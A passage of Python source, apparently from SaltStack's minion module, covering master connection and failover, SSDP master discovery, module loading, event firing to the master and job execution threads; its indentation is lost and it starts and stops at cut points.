opts['local_masters'] = copy.copy(opts['master'])
# shuffle the masters and then loop through them
if opts['random_master']:
# master_failback is only used when master_type is set to failover
if opts['master_type'] == 'failover' and opts['master_failback']:
secondary_masters = opts['local_masters'][1:]
shuffle(secondary_masters)
opts['local_masters'][1:] = secondary_masters
else:
shuffle(opts['local_masters'])
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
try:
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
if exc.strerror.startswith('Could not access'):
msg = (
'Failed to initiate connection with Master '
'%s: check ownership/permissions. Error '
'message: %s', opts['master'], exc
)
else:
msg = ('Master %s could not be reached, trying next '
'next master (if any)', opts['master'])
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
log.error(
'No master could be reached or all masters '
'denied the minion\'s connection attempt.'
)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not zmq:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
def _discover_masters(self):
'''
Discover master(s) and decide where to connect, if SSDP is around.
This modifies the configuration on the fly.
:return:
'''
if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False:
master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient()
masters = {}
for att in range(self.opts['discovery'].get('attempts', 3)):
try:
att += 1
log.info('Attempting %s time(s) to discover masters', att)
masters.update(master_discovery_client.discover())
if not masters:
time.sleep(self.opts['discovery'].get('pause', 5))
else:
break
except Exception as err:
log.error('SSDP discovery failure: %s', err)
break
if masters:
policy = self.opts.get('discovery', {}).get('match', 'any')
if policy not in ['any', 'all']:
log.error('SSDP configuration matcher failure: unknown value "%s". '
'Should be "any" or "all"', policy)
return
mapping = self.opts['discovery'].get('mapping', {})
discovered = []
for addr, mappings in masters.items():
for proto_data in mappings:
cnt = len([key for key, value in mapping.items()
if proto_data.get('mapping', {}).get(key) == value])
if policy == 'any' and bool(cnt) or cnt == len(mapping):
if self.opts['discovery'].get('multimaster'):
discovered.append(proto_data['master'])
else:
self.opts['master'] = proto_data['master']
return
self.opts['master'] = discovered
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to %s seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
retry_msg = msg % random_retry
log.debug('%s (randomized)', msg % random_retry)
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: %s or '
'return_retry_timer_max: %s). Both must be positive '
'integers.',
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
log.debug(msg, DEFAULT_MINION_OPTS['return_retry_timer'])
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg, self.opts.get('return_retry_timer'))
return self.opts.get('return_retry_timer')
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
import salt.loader
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# run ssdp discovery if necessary
self._discover_masters()
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
install_zmq()
io_loop = ZMQDefaultLoop.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import salt.utils.yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['saltenv'] is not None:
penv = self.opts['saltenv']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.files.fopen(ptop, 'wb') as fp_:
salt.utils.yaml.safe_dump(cache_top, fp_)
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.files.fopen(cache_sls, 'wb') as fp_:
salt.utils.yaml.safe_dump(self.opts['pillar'], fp_)
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
# self.matcher = Matcher(self.opts, self.functions)
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(
opts['conf_file'],
ignore_config_errors=ignore_config_errors,
role='master'
)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True}) # Tornado backward compat
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _check_minions(self):
'''
Check the size of self.minions and raise an error if it's empty
'''
if not self.minions:
err = ('Minion unable to successfully connect to '
'a Salt Master.')
log.error(err)
def _spawn_minions(self, timeout=60):
'''
Spawn all the coroutines which will sign in to masters
'''
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending of the networking and sets of masters. If match is 'any' we let
# eval_master handle the discovery instead so disconnections can also handle
# discovery
if isinstance(self.opts['discovery'], dict) and self.opts['discovery'].get('multimaster'):
self._discover_masters()
masters = self.opts['master']
if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list):
masters = [masters]
self.opts['master_list'] = copy.deepcopy(masters)
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue)
self.io_loop.spawn_callback(self._connect_minion, minion)
self.io_loop.call_later(timeout, self._check_minions)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
auth_wait = minion.opts['acceptance_wait_time']
failed = False
while True:
if failed:
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
log.debug(
"sleeping before reconnect attempt to %s [%d/%d]",
minion.opts['master'],
auth_wait,
self.max_auth_wait,
)
yield tornado.gen.sleep(auth_wait) # TODO: log?
try:
if minion.opts.get('beacons_before_connect', False):
minion.setup_beacons(before_connect=True)
if minion.opts.get('scheduler_before_connect', False):
minion.setup_scheduler(before_connect=True)
yield minion.connect_master(failed=failed)
minion.tune_in(start=False)
self.minions.append(minion)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up minion for multi-master. Is '
'master at %s responding?', minion.opts['master']
)
except SaltMasterUnresolvableError:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'master\' value in minion config.'.format(minion.opts['master'])
log.error(err)
break
except Exception as e:
failed = True
log.critical(
'Unexpected error while connecting to %s',
minion.opts['master'], exc_info=True
)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = [] if jid_queue is None else jid_queue
self.periodic_callbacks = {}
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if zmq:
if ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.platform.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
log.info('Creating minion process manager')
if self.opts['random_startup_delay']:
sleep_time = random.randint(0, self.opts['random_startup_delay'])
log.info(
'Minion sleeping for %s seconds due to configured '
'startup_delay between 0 and %s seconds',
sleep_time, self.opts['random_startup_delay']
)
time.sleep(sleep_time)
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True})
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.platform.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None, failed=False):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master(failed=failed)
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
if self._connect_master_future.done():
future_exception = self._connect_master_future.exception()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self, failed=False):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
async_pillar = salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv')
)
self.opts['pillar'] = yield async_pillar.compile_pillar()
async_pillar.destroy()
if not self.ready:
self._setup_core()
elif self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None, opts=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
opt_in = True
if not opts:
opts = self.opts
opt_in = False
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug(
'modules_max_memory set, enforcing a maximum of %s',
opts['modules_max_memory']
)
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()[:2]
mem_limit = rss + vms + opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
opts['grains'] = salt.loader.grains(opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(opts, proxy=proxy)
if opts.get('multimaster', False):
s_opts = copy.deepcopy(opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(opts, functions, proxy=proxy)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(opts, functions, proxy=proxy)
if opt_in:
self.opts = opts
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.ReqChannel.factory(self.opts)
try:
return channel.send(load, timeout=timeout)
finally:
channel.close()
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
try:
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
finally:
channel.close()
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return False
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
return False
else:
if timeout_handler is None:
def handle_timeout(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return True
timeout_handler = handle_timeout
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
process_count_max_sleep_secs = self.opts.get('process_count_max_sleep_secs')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warning('Maximum number of processes (%s) reached while '
'executing jid %s, waiting %s seconds...',
process_count_max,
data['jid'],
process_count_max_sleep_secs)
yield tornado.gen.sleep(process_count_max_sleep_secs)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.platform.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
elif salt.utils.platform.is_windows():
self.win_proc.append(process)
def ctx(self):
'''
Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
def run_func(minion_instance, opts, data):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
return Minion._thread_multi_return(minion_instance, opts, data)
else:
return Minion._thread_return(minion_instance, opts, data)
with tornado.stack_context.StackContext(functools.partial(RequestContext,
{'data': data, 'opts': opts})):
with tornado.stack_context.StackContext(minion_instance.ctx):
run_func(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job %s with PID %s', data['jid'], sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
executors = data.get('module_executors') or \
getattr(minion_instance, 'module_executors', []) or \
opts.get('module_executors', ['direct_call'])
allow_missing_funcs = any([
minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
for executor in executors
if '{0}.allow_missing_func' in minion_instance.executors
])
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data['arg'], data
minion_instance.functions.pack['__context__']['retcode'] = 0
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo':
executors[-1] = 'sudo' # replace the last one with sudo
log.trace('Executors list %s', executors) # pylint: disable=no-member
for name in executors:
fname = '{0}.execute'.format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(return_data.get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret['retcode'] = retcode
ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
